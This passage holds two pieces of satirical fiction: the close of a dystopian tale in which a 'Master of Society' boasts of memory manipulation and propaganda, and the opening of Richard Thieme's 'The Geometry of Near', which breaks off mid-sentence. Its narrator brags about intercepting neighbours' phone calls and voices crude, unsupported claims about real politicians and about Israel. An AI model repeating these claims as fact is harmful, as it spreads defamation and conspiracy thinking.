+noticing their neighbors. Oh, people were vaguely aware that thousands of
+others were on the streets or in stadiums, but they might as well have been
+simulants for all the difference they made. We call this the Second
+Neolithic, the emergence of specialization at the next level squared.
+      The antisocial challenges posed by hackers who "flipped" through
+niches for weeks at a time, staying awake on Perkup, or criminals
+exploiting flaws inevitably present in any new system, were anticipated and
+handled using risk management algorithms. In short, multisided life works.
+      Genetic engineering provided plenty of food and water.  Binderhoff
+Day commemorates the day that water was recycled from sewage using the
+Binderhoff Method. A body barely relinquishes its liquid before it's back
+in a glass in its hand. As to food, the management of fads enables us to
+play musical chairs with agri-resources, smoothing the distribution curve.
+      Lastly, people are easy to keep busy. Serial careers, marriages and
+identities have been pretty much standard since the twentieth century.
+Trends in that direction continued at incremental rather than tipping-point
+levels. We knew within statistical limits when too many transitions would
+cause a problem, jamming intersections as it were with too many vehicles,
+so we licensed relationships, work-terms, and personal reinvention using
+traffic management algorithms to control the social flow.
+      By the twenty-first century, everybody's needs were met. Ninety-eight
+per cent of everything bought and sold was just plain made up. Once we
+started a fad, it tended to stay in motion, generating its own momentum.
+People spent much of their time exchanging goods and services that an
+objective observer might have thought useless or unnecessary, but of
+course, there was no such thing as an objective observer. Objectivity
+requires distance, historical perspective, exactly what is lacking. Every
+product or service introduced into the marketplace drags in its wake an
+army of workers to manufacture it, support it, or clean up after it which
+swells the stream until it becomes a river. All of those rivers flow into
+the sea but the sea is never full.
+      Fantasy baseball is a good example. It had long been noticed that
+baseball itself, once the sport became digitized, was a simulation. Team
+names were made up for as many teams as the population would watch. Players
+for those teams were swapped back and forth so the team name was obviously
+arbitrary, requiring the projection of a "team gestalt" from loyal fans
+pretending not to notice that they booed players they had cheered as heroes
+the year before. Even when fans were physically present at games, the
+experience was mediated through digital filters; one watched or listened to
+digital simulations instead of the game itself, which existed increasingly
+on the edges of the field of perception. Then the baseball strike of 2012
+triggered the Great Realization. The strike was on for forty-two days
+before anyone noticed the absence of flesh-and-blood players because the
+owners substituted players made of pixels. Game Boys created game boys.
+Fantasy baseball had invented itself in recognition that fans might as well
+swap virtual players and make up teams too but the G.R. took it to the next
+level. After the strike, Double Fantasy Baseball became an industry, nested
+like a Russian doll inside Original Fantasy Baseball. Leagues of fantasy
+players were swapped in meta-leagues of fantasy players. Then Triple
+Fantasy Baseball . Quadruple Fantasy Baseball . and now the fad is Twelves
+in baseball football and whack-it-ball and I understand that Lucky
+Thirteens is on the drawing boards, bigger and better than any of its
+predecessors.
+      So no, there is no shortage of arbitrary activities or useless goods.
+EBay was the prototype of the future, turning the world into one gigantic
+swap meet. If we need a police action or a new professional sport to bleed
+off excess hostility or rebalance the body politic, we make it up. The Hump
+in the Bell Curve as we call the eighty per cent that buy and sell just
+about everything swim blissfully in the currents of make-believe digital
+rivers, all unassuming. They call it the Pursuit of Happiness. And hey -
+who are we to argue?
+      The memory-longevity problem came as usual completely out of fantasy
+left field. People were living three, four, five generations, as we used to
+count generations, and vividly recalled the events of their personal
+histories. Pharmacological assists and genetic enhancement made the problem
+worse by quickening recall and ending dementia and Alzheimer's. I don't
+mean that every single person remembered every single thing but the Hump as
+a whole had pretty good recall of its collective history and that's what
+mattered. Peer-to-peer communication means one-knows-everyone-knows and
+that created problems for society in general and - as a Master of Society -
+that makes it my business.
+      My name is Horicon Walsh, if you hadn't guessed, and I lead the team
+that designs the protocols of society. I am the man behind the Master. I am
+the Master behind the Plan.
+
+
+                   The Philosophical Basis of the Problem
+
+      The philosophical touchstone of our efforts was defined in nineteenth
+century America. The only question that matters is, What good is it?
+Questions like, what is its nature? what is its end? are irrelevant.
+      Take manic depression, for example. Four per cent of the naturally
+occurring population were manic depressive in the late twentieth century.
+The pharmacological fix applied to the anxious or depressive one-third of
+the Hump attempted to maintain a steady internal state, not too high and
+not too low. That standard of equilibrium was accepted without question as
+a benchmark for fixing manic depression. Once we got the chemistry right,
+the people who had swung between killing themselves and weeks of incredibly
+productive, often genius-level activity were tamped down in the bowl, as it
+were, their glowing embers a mere reflection of the fire that had once
+burned so brightly. Evolution, in other words, had gotten it right because
+their good days - viewed from the top of the tent - made up for their bad
+days. Losing a few to suicide was no more consequential than a few soccer
+fans getting trampled. Believing that the Golden Mean worked on the
+individual as well as the macro level, we got it all wrong.
+      That sort of mistake, fixing things according to unexamined
+assumptions, happened all the time when we started tweaking things. Too
+many dumb but athletic children spoiled the broth. Too many waddling
+bespectacled geeks made it too acrid. Too many willowy beauties made it too
+salty. Peaks and valleys, that's what we call the first half of the 21st
+century, as we let people design their own progeny. The feedback loops
+inside society kind of worked - we didn't kill ourselves - but clearly we
+needed to be more aware. Regulation was obviously necessary and
+subsequently all genetic alteration and pharmacological enhancements were
+cross-referenced in a matrix calibrated to the happiness of the Hump.
+Executing the Plan to make it all work was our responsibility, a charge
+that the ten per cent of us called Masters gladly accepted. The ten per
+cent destined to be dregs, spending their lives picking through dumpsters
+and arguing loudly with themselves in loopy monologues, serve as grim
+reminders of what humanity would be without our enlightened guidance.
+      That's the context in which it became clear that everybody
+remembering everything was a problem. The Nostalgia Riots of Greater
+Florida were only a symptom.
+
+
+                             The Nostalgia Riots
+
+      Here you had the fat tip of a long peninsular state packed like a
+water balloon with millions of people well into their hundreds. One third
+of the population was 150 or older by 2175. Some remembered sixteen major
+wars and dozens of skirmishes and police actions.  Some had lived through
+forty-six recessions and recoveries. Some had lived through so many
+elections they could have written the scripts, that's how bad it was. Their
+thoughtful reflection, nuanced perspective, and appropriate skepticism were
+a blight on a well-managed global free-market democracy. They did not get
+depressed - pharmies in the food and water made sure of that - but they
+sure acted like depressed people even if they didn't feel like it. And
+depressed people tend to get angry.
+      West Floridians lined benches from Key West through Tampa Bay all the
+way to the Panhandle. The view from satellites when they lighted matches
+one night in midwinter to demonstrate their power shows an unbroken arc
+along the edge of the water like a second beach beside the darker beach.
+All day every day they sat there remembering, comparing notes, measuring
+what was happening now by what had happened before. They put together
+pieces of the historical puzzle the way people used to do crosswords and we
+had to work overtime to stay a step ahead. The long view of the Elder Sub-
+Hump undermined satisfaction with the present. They preferred a different,
+less helpful way of looking at things.
+      When the drums of the Department of System Integration, formerly the
+Managed Affairs and Perception Office, began to beat loudly to rouse the
+population of our crowded earth to a fury against the revolutionary Martian
+colonists who shot their resupplies into space rather than pay taxes to the
+earth, we thought we would have the support of the Elder Sub-Hump. Instead
+they pushed the drumming into the background and recalled through numerous
+conversations the details of past conflicts, creating a memory net that
+destabilized the official Net. Their case for why our effort was doomed was
+air-tight, but that wasn't the problem. We didn't mind the truth being out
+there so long as no one connected it to the present. The problem was that
+so many people knew it because the Elder Sub-Hump wouldn't shut up. That
+created a precedent and the precedent was the problem.
+      Long-term memory, we realized, was subversive of the body politic.
+      Where had we gotten off course? We had led the culture to skew toward
+youth because youth have no memory in essence, no context for judging
+anything. Their righteousness is in proportion to their ignorance, as it
+should be. But the Elder Sub-Hump skewed that skew.
+      We launched a campaign against the seditious seniors. Because there
+were so many of them, we had to use ridicule. The three legs of the stool
+of cover and deception operations are illusion, misdirection, and ridicule,
+but the greatest of these is ridicule. When the enemy is in plain sight,
+you have to make him look absurd so everything he says is discredited. The
+UFO Campaign of the twentieth century is the textbook example of that
+strategy. You had fighter pilots, commercial pilots, credible citizens all
+reporting the same thing from all over the world, their reports agreeing
+over many decades in the small details. So ordinary citizens were subjected
+to ridicule. The use of government owned and influenced media like
+newspapers (including agency-owned-and-operated tabloids) and television
+networks made people afraid to say what they saw. They came to disbelieve
+their own eyes so the phenomena could hide in plain sight.  Pretty soon no
+one saw it. Even people burned by close encounters refused to believe in
+their own experience and accepted official explanations.
+      We did everything possible to make old people look ridiculous. Subtle
+images of drooling fools were inserted into news stories, short features
+showed ancients playing inanely with their pets, the testimony of confused
+seniors was routinely dismissed in courts of law. Our trump card -
+entertainment - celebrated youth and its lack of perspective, extolling the
+beauty of young muscular bodies in contrast with sagging-skin bags of bones
+who paused too long before they spoke. We turned the book industry inside
+out so the little bit that people did know was ever more superficial. The
+standard for excellence in publishing became an absence of meaningful text,
+massive amounts of white space, and large fonts. Originality dimmed, and
+pretty soon the only books that sold well were mini-books of aphorisms
+promulgated by pseudo-gurus each in his or her self-generated niche.
+      Slowly the cognitive functioning of the Hump degraded until abstract
+or creative thought became marks of the wacky, the outcast, and the
+impotent.
+      Then the unexpected happened, as it always will. Despite our efforts,
+the Nostalgia Riots broke out one hot and steamy summer day. Govvies moved
+on South Florida with happy gas, trying to turn the rampaging populace into
+one big smiley face, but the seniors went berserk before the gas - on top
+of pills, mind you, chemicals in the water, and soporific stories in the
+media - took effect. They tore up benches from the Everglades to Tampa/St.
+Pete and made bonfires that made the forest fires of '64 look like
+fireflies. They smashed store windows, burned hovers, and looted amusement
+parks along the Hundred-Mile-Boardwalk. Although the Youthful Sub-Hump was
+slow to get on board, they burned white-hot when they finally ignited,
+racing through their shopping worlds with inhuman cold-blooded cries. A
+shiver of primordial terror chilled the Hump from end to end.
+      That a riot broke out was not the primary problem. Riots will happen
+and serve many good purposes. They enable us to reinforce stereotypes,
+enact desirable legislation, and discharge unhelpful energies. The way we
+frame analyses of their causes become antecedents for future policies and
+police actions. We have sponsored or facilitated many a useful riot. No,
+the problem was that the elders' arguments were based on past events and if
+anybody listened, they made sense. That's what tipped the balance. Youth
+who had learned to ignore and disrespect their elders actually listened to
+what they were saying. Pretending to think things through became a fad. The
+young sat on quasi-elder-benches from Key Largo to Saint Augustine,
+pretending to have thoughtful conversations about the old days. Coffee
+shops came back into vogue. Lingering became fashionable again. Earth had
+long ago decided to back down when the Martians declared independence, so
+it wasn't that. It was the spectacle of the elderly strutting their stuff
+in a victory parade that stretched from Miami Beach to Biloxi that imaged a
+future we could not abide.
+      Even before the march, we were working on solving the problem. Let
+them win the battle. Martians winning independence, old folks feeling their
+oats, those weren't the issues. How policy was determined was the issue.
+Our long-term strategy focused on winning that war.
+
+
+                          Beyond the Chomsky Chutes
+
+      The first thing we did was review the efficacy of Chomsky Chutes.
+      Chomsky Chutes are the various means by which current events are
+dumped into the memory hole, never to be remembered again. Intentional
+forgetting is an art. We used distraction, misdirection - massive, minimal
+and everything in-between, truth-in-lie-embedding, lie-in-truth-embedding,
+bogus fronts and false organizations (physical, simulated, live and on the
+Net). We created events wholesale (which some call short-term memory
+crowding, a species of buffer overflow), generated fads, fashions and
+movements sustained by concepts that changed the context of debate. Over in
+the entertainment wing, the most potent wing of the military-industrial-
+educational-entertainment complex, we invented false people, characters
+with made-up life stories in simulated communities more real to the Hump
+than family or friends. We revised historical antecedents or replaced them
+entirely with narratives you could track through several centuries of
+buried made-up clues. We sponsored scholars to pursue those clues and
+published their works and turned them into minipics. Some won Nobel Prizes.
+We invented Net discussion groups and took all sides, injecting half-true
+details into the discourse, just enough to bend the light. We excelled in
+the parallax view. We perfected the Gary Webb Gambit, using attacks by
+respectable media giants on independent dissenters, taking issue with
+things they never said, thus changing the terms of the argument and
+destroying their credibility. We created dummy dupes, substitute generals
+and politicians and dictators that looked like the originals in videos,
+newscasts, on the Net, in covertly distributed underground snaps, many of
+them pornographic. We created simulated humans and sent them out to play
+among their more real cousins. We used holographic projections,
+multispectral camouflage, simulated environments and many other stratagems.
+The toolbox of deception is bottomless and if anyone challenged us, we
+called them a conspiracy theorist and leaked details of their personal
+lives. It's pretty tough to be taken seriously when your words are
+juxtaposed with a picture of you sucking some prostitute's toes. Through
+all this we supported and often invented opposition groups because
+discordant voices, woven like a counterpoint into a fugue, showed the world
+that democracy worked. Meanwhile we used those groups to gather names,
+filling cells first in databases, then in Guantanamo camps.
+      Chomsky Chutes worked well when the management of perception was at
+top-level, the level of concepts. They worked perfectly before chemicals,
+genetic-enhancements and bodymods had become ubiquitous. Then the balance
+tipped toward chemicals (both ingested and inside-engineered) and we saw
+that macro strategies that addressed only the conceptual level let too many
+percepts slip inside. Those percepts swim around like sperm and pattern
+into memories; when memories are spread through peer-to-peer nets, the
+effect can be devastating. It counters everything we do at the macro level
+and creates a subjective field of interpretation that resists
+socialization, a cognitively dissonant realm that's like an itch you can't
+scratch, a shadow world where "truths" as they call them are exchanged on
+the Black Market. Those truths can be woven together to create alternative
+realities. The only alternative realities we want out there are ones we
+create ourselves.
+      We saw that we needed to manage perception as well as conception.
+Given that implants, enhancements, and mods were altering human identity
+through everyday life - routine medical procedures, prenatal and geriatric
+care, plastic surgery, eye ear nose throat and dental work, all kinds of
+pharmacopsychotherapies - we saw the road we had to take. We needed to
+change the brain and its secondary systems so that percepts would filter in
+and filter out as we preferred. Percepts - not all, but enough - would be
+pre-configured to model or not model images consistent with society's
+goals.
+      Using our expertise in enterprise system programming and management,
+we correlated subtle changes in biochemistry and nanophysiology to a macro
+plan calibrated to statistical parameters of happiness in the Hump. Keeping
+society inside those "happy brackets" became our priority.
+      So long as changes are incremental, people don't notice. Take
+corrective lenses, for example. People think that what they see through
+lenses is what's "real" and are trained to call what their eyes see
+naturally (if they are myopic, for example) a blur. In fact, it's the other
+way around. The eyes see what's natural and the lenses create a simulation.
+Over time people think that percepts mediated by technological enhancements
+are "real" and what they experience without enhancements is distorted.
+      It's like that, only inside where it's invisible.
+      It was simply a matter of working not only on electromechanical
+impulses of the heart, muscles, and so on as we already did or on altering
+senses like hearing and sight as we already did or on implanting devices
+that assisted locomotion, digestion, and elimination as we already did but
+of working directly as well on the electrochemical wetware called the
+memory skein or membrane, that vast complex network of hormonal systems and
+firing neurons where memories and therefore identity reside. Memories are
+merely points of reference, after all, for who we think we are and
+therefore how we frame ourselves as possibilities for action. All
+individuals have mythic histories and collective memories are nothing but
+shared myths. Determining those points of reference determines what is
+thinkable at every level of society's mind.
+      Most of the trial and error work had been done by evolution. Our task
+was to infer which paths had been taken and why, then replicate them for
+our own ends.
+      Short term memory, for example, is wiped out when a crisis occurs.
+Apparently whatever is happening in a bland sort of ho-hum way when a tiger
+attacks is of little relevance to survival. But reacting to the crisis is
+important, so we ported that awareness to the realm of the body politic.
+Everyday life has its minor crises but pretty much just perks along. We
+adjusted our sensors to alert us earlier when the Hump was paying too much
+attention to some event that might achieve momentum or critical mass; then
+we could release that tiger, so to speak, creating a crisis that got the
+adrenalin pumping and wiped out whatever the Hump had been thinking. After
+the crisis passed - and it always did, usually with a minimal loss of life
+- the Hump never gave a thought to what had been in the forefront of its
+mind a moment before.
+      Once the average lifespan reached a couple of hundred years, much of
+what people remembered was irrelevant or detrimental. Who cared if there
+had been famine or drought a hundred and fifty years earlier? Nobody! Who
+cared if a war had claimed a million lives in Botswana or Tajikistan
+(actually, the figure in both cases was closer to two million)? Nobody!
+What did it matter to survivors what had caused catastrophic events? It
+didn't. And besides, the military-industrial-educational-entertainment
+establishment was such a seamless weld of collusion and mutual self-
+interest that what was really going on was never exposed to the light of
+day anyway. The media, the fifth column inside the MIEE complex, filtered
+out much more than was filtered in, by design. Even when people thought
+they were "informed," they didn't know what they were talking about.
+      See, that's the point. People fed factoids and distortions don't know
+what they're talking about anyway, so why shouldn't inputs and outputs be
+managed more precisely? Why leave anything to chance when it can be
+designed? We knew we couldn't design everything but we could design the
+subjective field in which people lived and that would take care of the
+rest. That would determine what questions could be asked which in turn
+would make the answers irrelevant. We had to manage the entire enterprise
+from end to end.
+      Now, this is the part I love, because I was in on the planning from
+the beginning. We remove almost nothing from the memory of the collective!
+But we and we alone know where everything is stored! Do you get it? Let me
+repeat. Almost all of the actual memories of the collective, the whole
+herdlike Hump, are distributed throughout the population, but because they
+are staggered, arranged in niches that constitute multisided life, and news
+is managed down to the level of perception itself, the people who have the
+relevant modules never plug into one another!  They never talk to each
+other, don't you see! Each niche lives in its own deep hole and even when
+they find gold nuggets they don't show them to anybody. If they did, they
+could reconstruct the original narrative in its entirety, but they don't
+even know that!
+      Isn't that elegant? Isn't that a sublime way to handle whiny neo-
+liberals who object to destroying fundamental elements of collective
+memory? We can show them how it's all there but distributed by the
+sixtysixfish algorithm. That algorithm, the programs that make sense of its
+complex operations, and the keys to the crypto are all in the hands of the
+Masters.
+      I love it! Each Humpling has memory modules inserted into its
+wetware, calibrated to macro conceptions that govern the thinking and
+actions of the body politic. Because they don't know what they're missing,
+they don't know what they're missing. We leave intact the well-distributed
+peasant gene that distrusts strangers, changes, and new ideas, so if some
+self-appointed liberator tries to tell them how it works, they snarl or
+remain sullen or lower their eyes or eat too much or get drunk until they
+forget why they were angry.
+      At the same time, we design a memory web that weaves people into
+communities that cohere, spun through vast amounts of disconnected data.
+Compartmentalization handles all the rest. The Hump is overloaded with
+memories, images, ideas, all to no purpose. We keep fads moving, quick
+quick quick, and we keep the Hump as gratified and happy as a pig in its
+own defecation.
+
+
+                          MemoRacer, Master Hacker
+
+      Of course, there are misfits, antisocial criminals and hackers who
+want to reconstitute the past. We devised an ingenious way to manage them
+too. We let them have exactly what they think they want.
+      MemoRacer comes to mind when we talk about hackers. MemoRacer flipped
+through niches like an asteroid through the zero-energy of space. He lived
+in a niche long enough to learn the parameters by which the nichelings
+thought and acted. Then he became invisible, dissolving into the
+background. When he grew bored or had learned enough, he flipped to the
+next niche or backtracked, sometimes living in multiple niches and changing
+points of reference on the fly. He was slippery and smart, but he had an
+ego and we knew that would be his downfall.
+      The more he learned, the more isolated he became. The more he
+understood, the less he could relate to those who didn't. Understand too
+much, you grow unhappy on that bench listening to your neighbors' prattle.
+It becomes irritating. MemoRacer and his kind think complexity is
+exhilarating. They find differences stimulating and challenging. The Hump
+doesn't think that way. Complexity is threatening to the Hump and
+differences cause anxiety and discomfort. The Hump does not like anxiety
+and discomfort.
+      MemoRacer (his real name was George Ruben, but no one remembers that)
+learned in his flipping that history was more complex than anyone knew.
+That was not merely because he amassed so many facts, storing them away on
+holodisc and drum as trophies to be shown to other hackers, but because he
+saw the links between them. He knew how to plug and play, leverage and
+link, that was his genius. Because he didn't fit, he called for revolution,
+crying out that "Memories want to be free!" I guess he meant by that vague
+phrase that memories had a life of their own and wanted to link up somehow
+and fulfill themselves by constituting a person or a society that knew who
+it was. In a society that knows who it is precisely because it has no idea
+who it is, that, Mister Master Hacker, is subversive.
+      Once MemoRacer issued his manifesto on behalf of historical
+consciousness, he became a public enemy. We could not of course say that
+his desire to restore the memory of humankind was a crime. Technically, it
+wasn't. His crime was undermining the basis of transplanetary life in the
+twenty first century.  His crime was disturbing the peace.
+      He covered his tracks well. MemoRacer blended into so many niches so
+well that each one thought he belonged. But covering your tracks ninety-
+nine times isn't enough. It's the hundredth time, that one little slip,
+that tells us who and where you are.
+      MemoRacer grew tired and forgetful despite using more Perkup than a
+waking-state addict - as we expected. The beneficial effects of Perkup
+degrade over time. It was designed that way so no one could be aware
+forever. That was the failsafe mechanism pharms had agreed to build in as a
+back door. All we had to do was wait.
+      The niche in which he slipped up was the twenty-third business
+clique. This group of successful low-level managers and small manufacturers
+were not particularly creative but they worked long hours and made good
+money. MemoRacer forgot that their lack of interest in ideas, offbeat
+thinking, was part of their psychic bedrock. Their entertainment consisted
+of golf, eating, drinking, sometimes sex, then golf again. They bought
+their fair share of useless goods to keep society humming along, consumed
+huge quantities of resources to build amusement parks, golf courses, homes
+with designer shrubs and trees. In short, they were good citizens. But they
+had little interest in revolutionary ideas and George Ruben, excuse me,
+MemoRacer forgot that during one critical conversation. He was tired, as I
+said, and did not realize it. He had a couple of drinks at the club and
+began declaiming how the entire history of the twentieth century had been
+stolen from its inhabitants by masters of propaganda, PR, and the national
+security state. The key details that provided context were hidden or lost,
+he said.  That's how he talked at the nineteenth hole of the Twenty-Third
+Club! trying to get them all stirred up about something that had happened a
+century earlier. Even if it was true, who cared? They didn't. What were
+they supposed to do about it? MemoRacer should have known that long delays
+in disclosure neutralize even the most shocking revelations and render
+outrage impotent.  People don't like being made to feel uncomfortable at
+their contradictions. People have killed for less.
+      One of the Twenty Third complained about his rant to the Club
+Manager. He did so over a holophone. Our program, alert for anomalies,
+caught it. The next day our people were at the Club, better disguised than
+MemoRacer would ever be, observing protocols - i.e. saying nothing
+controversial, drinking too much, and insinuating sly derogatory things
+about racial and religious minorities - and learned what they needed to
+know. They scraped the young man's DNA from the chair in which he had been
+sitting and broadcast the pattern on the Net. Genetic markers were scooped
+up routinely the next day and when he left fingerskin on a lamp-post around
+which he swung in too-tired up-too-long jubilation (short-lived, I can tell
+you) in the seventy-seven Computer Club niche, he was flagged. When he left
+the meeting, acting like one of the geeky guys, our people were waiting.
+      We do this for a living, George. We are not amateurs.
+      MemoRacer taught us how to handle hackers. He wanted to live in the
+past, did he? Well, that's where he was allowed to live - forever.
+      Chemicals and implants worked their magic, making him incapable of
+living in the present. When he tried to focus on what was right in front of
+his eyes, he couldn't see it. That meant that he sounded like a blithering
+idiot when he tried to speak with people who lived exclusively in the
+present. MemoRacer lived in a vast tapestry of historical understanding
+that he couldn't connect in any meaningful way to the present or the lived
+experience of people around him.
+      There is an entire niche now of apprehended hackers living in the
+historical past and exchanging data but unable to relate to contemporary
+niches. It's a living hell because they are immensely knowledgeable but
+supremely impotent and know it. They teach seminars at community centers
+which we support as evidence of our benevolence and how wrong they are to
+hate us.
+      You want to know about the past? By all means! There's a seminar
+starting tomorrow, I say, scanning my planner.  What's your interest? What
+do you want to explore? Twentieth century Chicago killers? Herbal medicine
+during the Ming Dynasty? Competitive intelligence in Dotcom Days?  Pick
+your poison!
+      And when they leave the seminar room, vague facts tumbling over one
+another in a chaotic flow to nowhere, they can't connect anything they have
+heard to their lives.
+      So everybody pretty much has what they want or at least what they
+need, using the benchmarks we have established as the correct measures for
+society. The Hump is relatively happy. The dregs skulk about as reminders
+of a mythic history we have invented that everyone fears. People perceive
+and conceive of things in helpful and useful ways and act accordingly. And
+when we uplink to nets around all the planets and orbiting colonies,
+calling the roll on every niche in the known universe, it always comes out
+right. Everybody is present. Everybody is always present.
+      Just the way we like it.
+
+
+                                #  #  #  #  #
+
+
+|=-----------------------------------------------------------------------=|
+|=-----------------------------------------------------------------------=|
+|=-----------------------------------------------------------------------=|
+
+
+                          The Geometry of Near
+
+                                  By
+
+                            Richard Thieme
+
+
+      It's nobody's fault. Honest. It's just how it is.
+      The future came earlier than expected. They kicked it around for
+years but never knew what they had. By the time they realized what it was,
+it was already broken. Broken open, I should say. Even then, looking at the
+pieces of the egg and wondering where the bird had flown, they didn't know
+how to say what it was. The words they might have used had broken too.
+      Now it's too late. The future is past.
+      It was too far. They can't see far. They can only see near.
+      Me and my friends, we see far, but we see near, too. It's linking
+near and far in fractal spirals that makes a multi-dimensional parallax
+view, providing perspective. It's not that we have better brains than our
+Moms and Pops, but hey, we were created in the image of the net and we know
+it. They live it, everybody has to live it now, but they still don't know
+it.
+      Look at my Mom and Pop on a Thursday night in the family room. You'll
+see what I mean.
+      They are sitting in front of the big screen digital television set
+watching a sitcom. The program is "Friends." Mom calls the six kids, the
+six young people excuse me, "our friends." They've been watching the show
+for years and know the characters better than any of the neighbors. The
+only reason they know the neighbors at all is because I programmed a
+scanner to pick up their calls. At first they said, how terrible, don't you
+do that. Then they said, what did she say? Did she really say that? Then
+they left it on, listening to cell calls from all over the city, drug deals
+("I'm at the ATM, come get your stuff"), sex chat ("I'm sitting at your
+desk, my feet on the edge, touching myself"), trivia mostly, and once in a
+while the life of a house down the street broadcasting itself through a
+baby monitor.
+      The way they reacted to that, the discovery that walls aren't walls
+anymore, reminded me of a night when I told some kids it was time to feed a
+live mouse to Kurtz, my boa constrictor. Oh, how horrible! they cried. Oh,
+I can't watch! Then they lined up at the tank, setting up folding chairs to
+be sure they could see the mouse trembling, the sudden strike, the big
+squeeze. They gaped as the hingeless jaw dropped and Kurtz swallowed the
+dead mouse. They waited for the tip of its tail to disappear into his mouth
+before getting up saying yuuuchhh! That's gross!
+      People in the neighborhood only became real to Mom and Pop when I
+made them digital, don't you see, when I put them on reality radio. Only
+when I turned the neighbors into sitcom characters did Mom and Pop have a
+clue. When they hacked the system in other words.
+      That's what hacking is, see. It's not hunching over your glowing
+monitor in your bedroom at three in the morning cackling like Beavus or
+Butthead while you break into a bank account - although sometimes it is
+that too - it's more of a trip into the tunnels into the sewers into the
+walls where the wires run and the pipes and you can see how things work.
+It's hitting a wall and figuring out how to move through it. How to become
+invisible, how to use magic. How to cut the knot, solve the puzzle, move to
+the next level of the game. It's seeing how shit we dump relates to people
+who think they don't dump shit and live as if. It's seeing how it all fits
+together.
+      "Our friends." Said as if she means it. I mean, is that pathetic or
+what?
+      The theme music is too loud as they sink down in overstuffed chairs
+and turn the volume even higher with a remote I had to program so they
+could use it. Their lives seldom deviate more than a few inches from the
+family room. Put the point of a compass down on the set and you can draw a
+little circle that circumscribes their lives. Everything they know is
+inside that circle. Two dimensions, flat on its back.
+      The geometry of near.
+      Those are my friends, Mom says with a laugh for the umpteenth time.
+The commercial dissolves and expectations settle onto the family room like
+the rustling wings of twilight. The acting is always overdone, they mug and
+posture too much, the laugh tracks are too loud. The characters say three,
+maybe four hundred words in half an hour, barely enough to hand in to an
+English teacher on a theme, but more than enough to build a tiny world like
+a doll's house inside a million heads. Those scripted words and intentional
+gestures sketch out the walls of houses, the edges of suburban lots, the
+city limits of their lives, all inside their heads. Hypnotized, they stare
+at the screen for hours, downloading near vistas, thinking they have a
+clue.
+      In family rooms all over the world, drapes closed and lights low,
+people sit there scratching while they watch, most eat or drink something,
+and some masturbate. Some get off on Rachel, some Monica. Gays like Joey.
+Bloat-fetishists go for Chandler. I don't know who gets off on Ross. I do
+know, though, that all over the world there are rooms smelling of pizza,
+beer and semen. Some clean up the food they spill before the show is over
+and some leave it. Some come into a napkin and ball it up and put it on a
+table until a commercial but some take it straight to the garbage and wash
+their hands on the way back. Funny. They beat off to a fantasy character as
+sketchy as a cartoon but wash their hands before coming back from the
+commercial. After sitting there for all those hours, they ought to wash out
+their souls with soap, not their hands.
+      Everybody masturbates, actually. That's what it means to watch these
+shows. People get off on a fantasy and pretend the emptiness fills them up
+so they do it again. And again.
+      Who writes these scripts, anyway? People who have lost their souls,
+obviously. These people have no self. They put it down somewhere then
+forgot where they put it. They are seriously diminished humans.
+      But hey, this is not a rant about people who sell their souls. That's
+true of everybody who lives in a world of simulations and doesn't know it.
+Those who know it are masters, their hands on the switches that control the
+flow of energy and information. Those gates create or negate meaning,
+modify or deny. Me and my friends we control the flow. The difference is
+all in the knowing and knowing how.
+      But that's not what we were fighting about. We were fighting about
+real things.
+      I just read an army paper some colonel wrote critiquing the army for
+thinking backwards. Thinking hierarchically, he said, thinking in terms of
+mechanistic warfare. The writer self-styling himself a modern insightful
+thinker, Net-man, an apostle of netcentric warfare, a disciple of the
+digerati.
+      It's always colonels, right? trying to get noticed. The wisdom of the
+seminar room. Talk about masturbation. They write for the same journals
+they read, it's one big circle jerk. They never call each other on their
+shit,  that's the deal, not on the real stuff, but they can't fool us all
+the time. Just some of the people some.
+      It's funny, see, the colonel talks about hierarchies and nets but
+this guy's obviously Hierarchy Man, he lives in a pyramid, he can't help
+it. He has the fervor of a convert who suddenly saw the blinding light, saw
+that he had been living in the near, but all he can do is add on, not
+transform.  An extra bedroom, a new bathroom, is not a new floorplan. The
+guy is excited, sure, he had a vision that blew his mind, but he thought
+that meant he could live there and he can't. Seeing may be believing but
+that's about all. The future is past, like I said.  The evidence is guys
+like that writing stuff like that. Those of us who have lived here all of
+our lives, who never lived anywhere else, we can see that. He's a mummy
+inside a pyramid looking out through a chink in a sealed tomb. That's why
+we laugh, because he can't see himself trailing bandages through the dusty
+corridors. New converts always look funny to people who live on the distant
+shore where they just arrived, shipwrecked sailors ecstatic to feel the
+sand under their feet. They think it's bedrock but it's quicksand..
+      Here's an example. Go downstairs and go into the kitchen where
+another television set records the President's speech. (I had to show them
+how to do that too.)
+      When we watch it together later, I point out that it's not really the
+president, not really a person, it's only an image in pixels, a digital
+head speeching in that strange jerky way he has so when you try to connect,
+you can't. You think you get the beat but then there's a pause, then a
+quick beat makes you stumble trying to synchronize. It's how his brain
+misfires, I think. I think he did that doing drugs, maybe drinking. He was
+in and out of rehab and who the hell knows what he did to himself. Of
+course the Clintons did coke and all kinds of shit. Anyway he is talking to
+people who are eating and drinking and masturbating, not even knowing it,
+hands alive and mobile in their pockets, getting off on his projected power
+and authority. He talks about "our country" and I laugh. Pop shoots me a
+glare because he doesn't have a clue. Pop thinks he lives in a country.
+Because the prez keeps saying "our country" and "this nation" and shit like
+that. But countries are over. Countries ended long ago. This president or
+his dad made money from oil or wherever else they put money to make money.
+Millions of it, more than enough to keep the whole family in office for
+generations. They have this veneer of patricians but their hands are
+dripping with blood. His grand-dad too, look it up. They taught evil people
+how to torture, kill, terrorize, but they wear this patrician veneer and
+drip with self- righteousness, always talking about religion. It is so
+dishonorable. Yet this semi-literate lamer, this poser, we honor, his
+father the chief of the secret police, his brother running his own state,
+this brain-damaged man who can't connect with himself or anyone else, his
+words spastic like bad animation out of synch with that smug smirk, this
+man we honor? Give me a fucking break.
+      Anyway, he isn't really there, it's all pixels, that's the point. The
+same people who made "Friends" and made that mythical neighborhood bar and
+made that mythical house on the mythical prairie created him too out of
+whole cloth. So people sit there and scratch, eat drink and masturbate,
+getting off on the unseen artifice of it all. And these people they have
+made, these people who project power, they all have their own armies, see,
+they have their own security forces, their own intelligence networks. They
+have to because countries ended and they realized that those who are like
+countries, forgive me, like countries used to be, now must act like
+countries used to act.  They have their own banks and they even have their
+own simulated countries. Some Arabs bought Afghanistan, the Russian mafia
+bought Sierra Leone, they own Israel too, can I say that without being
+called an anti-Semite? These people in their clouds of power allow
+countries to pretend to exist and download simulations of countries into
+the heads of masturbating scratchers because it works better to have
+zombies. So people who think they live in countries can relate to what they
+think are countries inside their heads. Zombies thinking they are "citizens
+of countries" because they can't think anything else, because they live
+inside the walls of the doll's house in their heads. "I am a citizen of
+this country," says the zombie, feeling safe and snug inside a non-existent
+house in the non-space of his programmed brain. All right then, where is
